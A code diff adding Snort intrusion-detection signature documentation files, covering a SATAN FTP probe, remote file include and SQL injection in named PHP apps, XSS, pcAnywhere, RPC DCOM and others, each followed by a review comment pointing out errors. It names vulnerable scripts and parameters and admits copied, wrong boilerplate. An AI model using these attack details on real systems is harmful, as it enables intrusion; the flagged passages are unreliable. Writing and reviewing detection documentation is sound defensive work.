+359
+
+--
+
+Summary:
+This event is generated when an attempt is made to login anonymously 
+into an ftp server using a suspicious password (-satan)
+
+--
+
+Impact:
+Possible unauthorized access. Information gathering.
+
+--
+
+Detailed Information:
+Satan is an open-source security scanner,a predecessor to Saint, which 
+checks for common vulnerabilities. When it detects an open ftp server, 
+it tries to log in anonymously using the password '-satan'
+
+--
+
+Affected Systems:
+Machines running anonymous ftp servers.
+
+--
+
+Attack Scenarios:
+An attacker scans a range of IPs using the Satan Scanner, checking for 
+known vulnerabilities. If the scanner encounters a ftp server, it tries 
+to log in .
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+A user may be using that same password for a legitimate 
+anonymous login.
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable anonymous FTP access.
+
+--
+
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS329
+
+--
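Review bot: Corrective Action "Disable anonymous FTP access" is disproportionate for a scanner probe: this event tells you someone ran SATAN against the host, so the useful follow-up is to check whether the anonymous login succeeded and what the scanner enumerated, and then decide whether anonymous FTP is needed at all. Also "scanner,a predecessor" needs a space and Attack Scenarios has a stray space in "log in .".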
--- /dev/null
+++ b/doc/signatures/100000435.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000435
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "Bs_Ml_User.class.php" using a remote file being passed as the "GLOBALS[APP][path][core]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "GLOBALS[APP][path][core]" parameter in the "Bs_Ml_User.class.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
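Review bot: The third Detailed Information paragraph and the Attack Scenarios section are the generic credential-validation text from the CGI files and do not describe a remote file include: the scenario here is an attacker passing the URL of a PHP file they host as GLOBALS[APP][path][core] so that Bs_Ml_User.class.php includes and executes it. Overwriting an entry of $GLOBALS through a request parameter requires register_globals, so Corrective Action should mention disabling register_globals and allow_url_fopen/allow_url_include alongside patching. "All systems running CGI applications using BlueShoes" should simply name the affected BlueShoes versions.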
--- /dev/null
+++ b/doc/signatures/100000512.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000512
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "lng.php" with SQL commands being passed as the "QuranID" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "QuranID" parameter in the "lng.php" script used by the 
+"VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
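Review bot: The third Detailed Information paragraph (client credential validation, trust relationships) is pasted from the CGI boilerplate and has nothing to do with SQL injection; drop it. Attack Scenarios already names the real cause (unsanitised input reaching the database), so Corrective Action should point at input validation or parameterised queries in the application rather than only "vendor supplied patches". Also "ona web server" should read "on a web server".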
--- /dev/null
+++ b/doc/signatures/100000169.txt
@@ -0,0 +1,57 @@
+Rule: 
+
+--
+Sid: 
+100000169
+
+-- 
+Summary: 
+The application fingerprinting tool Amap has been detected in HTTP traffic.
+
+--
+Impact:
+An attacker may be attempting to gather information about services on a 
+monitored network, in order to discover vulnerabilities in those services.
+
+--
+Detailed Information:
+Amap is an application fingerprinting tool released by a group of security 
+experts called THC, "The Hacker's Choice"; it is designed to identify services 
+reliably irrespective of the port they are run on. Amap functions by sending 
+"triggers" to open ports on a remote system which are designed to elicit a 
+response from a particular service. This rule is designed to detect the SSL 
+trigger sent by the program.
+
+--
+Affected Systems:
+Any system running an SSL-enabled web server.
+
+--
+Attack Scenarios:
+Attackers will use the Amap application fingerprinting tool.
+
+--
+Ease of Attack:
+Simple, as the program is publicly available and is well-documented.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check system logs and Snort alert logs for suspicious activity.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+
+--
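Review bot: Summary says Amap was "detected in HTTP traffic" while Detailed Information says the rule matches the SSL trigger; the two must agree, and since Amap sends its triggers to whatever port is open, Affected Systems should not be limited to "an SSL-enabled web server". Also "Additional References" is missing its colon.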
--- /dev/null
+++ b/doc/signatures/511.txt
@@ -0,0 +1,76 @@
+Rule:
+
+--
+Sid:
+511
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to a PC
+running pcAnywhere
+
+--
+Impact:
+Serious. By the very nature of pcAnywhere, without a strong administrative
+password, a successful attack will allow the attacker to gain total 
+control of the machine.
+
+--
+Detailed Information:
+pcAnywhere is a remote control administrative software package produced 
+by Symantec (http://www.symantec.com/pcanywhere/Consumer/features.html) 
+it allows control of a system via network or RAS connection.
+
+--
+Affected Systems:
+	Windows XP Home and Professional
+	Windows 2000 Professional/Server
+	Windows NT Workstation and Server 4.0
+	Windows 98/Me
+
+--
+Attack Scenarios:
+With a copy of pcAnywhere, and attacker can scan a network (port 22) or
+war-dial a series of modems, looking for pcAnywhere signatures.
+
+--
+Ease of Attack:
+Simple. All that is required is an install of pcAnywhere and a host
+to connect to.
+
+--
+False Positives:
+Since pcAnywhere uses the same port as SSH (22) a simple open port scan 
+can show hosts that my not have pcAnywhere installed
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Make sure only servers and workstations that require remote control have
+pcAnywhere installed.
+Make sure that a strong password is required for any level of access, 
+this ideally should be coupled with some for of alternate 
+authentication, such as SecurID, modem callback or be blocked at the 
+external firewall so that the remote control functionality is only 
+available on the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+
+RSA:
+RSA SecurID (www.rsasecurity.com/products/securid/)
+
+Arachnids:
+http://www.whitehats.com/info/IDS240
+
+--
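Review bot: "pcAnywhere uses the same port as SSH (22)" conflates two different ports: pcAnywhere's status listener on older releases was UDP 22 (with TCP 65301 for data; later releases use TCP 5631 and UDP 5632), whereas SSH is TCP 22, so a TCP port-22 scan does not reveal pcAnywhere and the False Positives text should be restated in terms of the UDP status probe. Typos: "and attacker" should be "an attacker", "my not" should be "may not", "some for of" should be "some form of".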
--- /dev/null
+++ b/doc/signatures/2321.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+2321
+
+--
+Summary:
+This event is generated when an attempt is made to access foxweb.exe, a 
+CGI web application running on a server.
+
+--
+Impact:
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+The FoxWeb application is used to communicate with FoxPro databases. The
+program foxweb.exe contains an error that may allow an attacker to
+execute arbitrary code of their choosing and possibly gain unauthorized
+administrator access to the server.
+
+--
+Affected Systems:
+	FoxWeb 2.5 and prior
+
+--
+Attack Scenarios:
+An attacker can exploit weaknesses to gain access as the administrator by supplying input of
+their choosing to the CGI program.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
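Review bot: Summary says the event fires on any attempt to access foxweb.exe, yet False Positives says "None known"; every legitimate FoxWeb request goes through foxweb.exe, so unless the rule also matches the malicious input it will alert on normal use, and the section should say so. "contains an error" in Detailed Information should name the class of flaw, and Additional References should cite the advisory for FoxWeb 2.5 that the Affected Systems line implies.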
--- /dev/null
+++ b/doc/signatures/2501.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2501
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of SSL Version 3.
+
+--
+Impact:
+Denial of Service (DoS).
+--
+Detailed Information:
+A vulnerability exists in the handling of SSL Version 3 requests that
+can be manipulated to cause a DoS condition in various software 
+implementations used on Microsoft operating systems.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library. SSL requests containing an
+invalid field, sent to vulnerable systems can cause the affected host to stop 
+handling any further requests.
+
+--
+Affected Systems:
+	Microsoft Windows 2000, 2003 and XP systems using SSL
+
+--
+Attack Scenarios:
+An attcker needs to make an SSL request to an affected system that
+contains an invalid field.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
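Review bot: Additional References is empty although Detailed Information and Affected Systems describe a specific, vendor-patched bug in the Microsoft SSL library; add the Microsoft bulletin and CVE identifier so "Apply the appropriate vendor supplied patches" is actionable. Also "attcker" should be "attacker", and the Impact section needs a blank line before its "--" like the other sections.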
--- /dev/null
+++ b/doc/signatures/100000410.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000410
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "REDAXO" application running on a webserver. Access to the file "index.inc.php" using a remote file being passed as the "REX[INCLUDE_PATH]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "REX[INCLUDE_PATH]" parameter in the "index.inc.php" script used by the "REDAXO" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using REDAXO
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
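Review bot: Attack Scenarios describes credential abuse, not a remote file include; for REX[INCLUDE_PATH] the scenario is that the attacker supplies a URL so index.inc.php includes and runs attacker-hosted PHP. State what the rule matches in the parameter value (a URL scheme, a specific host pattern) so False Positives can be assessed instead of asserting "None known", and replace "All systems running CGI applications using REDAXO" with the affected REDAXO versions.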
--- /dev/null
+++ b/doc/signatures/910.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+910
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a ColdFusion web server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Coldfusion. Many known vulnerabilities exist for this platform and 
+the attack scenarios are legion.
+
+--
+Affected Systems:
+	All systems running ColdFusion
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
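Review bot: Summary says "a known vulnerability" while Detailed Information says "many known vulnerabilities ... legion" and never says which ColdFusion component or request path this SID matches; name it. The Denial of Service claim in Impact is supported by nothing in Detailed Information and should be justified or dropped. Product spelling is inconsistent ("ColdFusion" vs "Coldfusion").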
--- /dev/null
+++ b/doc/signatures/2954.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2954
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
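Review bot: False Positives "None known" is wrong for a rule that alerts on access to administrative shares: administrators, backup agents and management tools connect to C$, ADMIN$ and IPC$ routinely, so the section should say the event must be judged against the source host and the account used. Corrective Action (apply patches) does not address the described problem, which is authorisation and credential strength on the shares rather than a software bug. "using Samba" is also too narrow, since any SMB client can make the request, and "adminsitrative" should be "administrative".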
--- /dev/null
+++ b/doc/signatures/2547.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2547
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with the web interface support for the HP JetAdmin printer.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code as root 
+on a vulnerable server.
+
+--
+Detailed Information:
+The HP Web JetAdmin provides a web interface for the administration of the HP
+Web JetAdmin printer.  A vulnerability exists that allows the uploading
+of unauthorized files using the script 
+/plugins/hpjwja/script/devices_update_printer_fw_upload.hts.  This capability
+was included to allow the upload of legitimate files, such as firmware updates,
+by an authorized administrator.  However, there is no file validation on the
+uploaded file, allowing the upload of any random file.  An attacker can upload
+a file with a .hts extension that subsequently can be executed when the
+attacker accesses the file using a web browser.
+
+--
+Affected Systems:
+HP Web JetAdmin 7.2.
+
+--
+Attack Scenarios:
+An attacker can create upload and execute a malicious file on a vulnerable server. 
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+An authorized administrator who uploads a file from an IP address outside the trusted
+network will cause a false positive alert.
+
+--
+False Negatives:
+The default HP Web JetAdmin port is 8000.  If an administrator selects a different port
+on which to run the web interface, no alert will be detected.  In that case, the rule
+should be altered to reflect the port on which the web interface runs.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software or apply the appropriate patch
+when it becomes available.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/9971
+
+--
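Review bot: "the HP JetAdmin printer" and "administration of the HP Web JetAdmin printer" are wrong: HP Web JetAdmin is the web-based management application for HP printers, not a printer, and the sentence should say so. Impact "as root" assumes a Unix install; "with the privileges of the Web JetAdmin service" is what the text supports. Attack Scenarios "can create upload and execute" needs commas.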
--- /dev/null
+++ b/doc/signatures/1899.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1899
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
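Review bot: The "--" separator between Detailed Information and Affected Systems is missing ("Authentication is not required to cause the overflow." is followed directly by "Affected Systems:"), and "Sid: 1899" puts the value on the heading line unlike the surrounding files. Also "compromize" should be "compromise" and "kerberos" should be capitalised consistently with "Kerberos" in the Summary.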
--- /dev/null
+++ b/doc/signatures/112-2.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+112-2
+
+--
+Summary:
+This event is generated when the pre-processor spp_arpspoof detects
+network traffic that may constitute an attack. Specifically an
+etherframe arp mismatch was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_arpspoof pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
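Review bot: Attack Scenarios is empty and Corrective Action ("apply vendor patches") does not fit an Ethernet/ARP mismatch: the event means the sender address inside the ARP packet disagreed with the Ethernet frame's source address, which is what ARP cache poisoning for a man-in-the-middle looks like, so the follow-up is to compare the observed MAC/IP pair with the bindings configured for spp_arpspoof and to inspect the switch port it arrived on. Also "consititute" should be "constitute" and "etherframe arp mismatch" should be spelled out.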
--- /dev/null
+++ b/doc/signatures/100000654.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000654
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "text" parameter in the "index.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
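Review bot: Impact overstates cross site scripting: the copied text claims server compromise and arbitrary code execution, but XSS runs attacker-supplied script in a victim's browser, so the realistic impact is session or cookie theft and actions performed in the victim's session, which is what Attack Scenarios already describes; make Impact match it. "All systems running CGI applications using MyPHP Guestbook" should name the affected versions.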
--- /dev/null
+++ b/doc/signatures/852.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+852
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
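Review bot: This file is word-for-word the 1090.txt entry from this same patch with only the SID changed, so it documents nothing specific to SID 852; name the CGI script and vulnerability this rule matches and cite the advisory in the empty Additional References. "ona web server" should read "on a web server".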
--- /dev/null
+++ b/doc/signatures/3313.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3313
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
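Review bot: Additional References is empty for a widely documented Microsoft RPC DCOM bug; add the Microsoft bulletin and CVE so "Apply the appropriate vendor supplied patches" is actionable. The port list in Corrective Action should also include TCP 593 (RPC over HTTP), which the vendor guidance for the DCOM issues recommends blocking alongside 135, 139 and 445. "Expoit" should be "Exploit".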
--- /dev/null
+++ b/doc/signatures/111-17.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+111-17
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an IDS evasion attempt.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected a TCP session that contains
+retransimitted data without the necessary retransmission request. This
+may be an attempt to evade any monitoring IDS.
+
+It may be possible for an attacker to send multiple small packets to a
+host then disguise an actual attack in a retransmitted packet to that
+same host.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker could cause a host to send multiple acknowledgement packets
+then supply one large malicious packet to the host disguised as a
+retransmission of data.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
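Review bot: "retransmitted data without the necessary retransmission request" misdescribes TCP: there is no explicit retransmission request, a sender retransmits on timeout or duplicate ACKs, so say what the preprocessor actually observed (a segment covering sequence numbers already received, and whether its payload differed from the original), which is the insertion/evasion case Attack Scenarios describes. Also "retransimitted" should be "retransmitted".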
--- /dev/null
+++ b/doc/signatures/100000746.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000746
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Randshop" application running on a webserver. Access to the file "header.inc.php" using a remote file being passed as the "dateiPfad" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "dateiPfad" parameter in the "header.inc.php" script used by the "Randshop" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Randshop
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
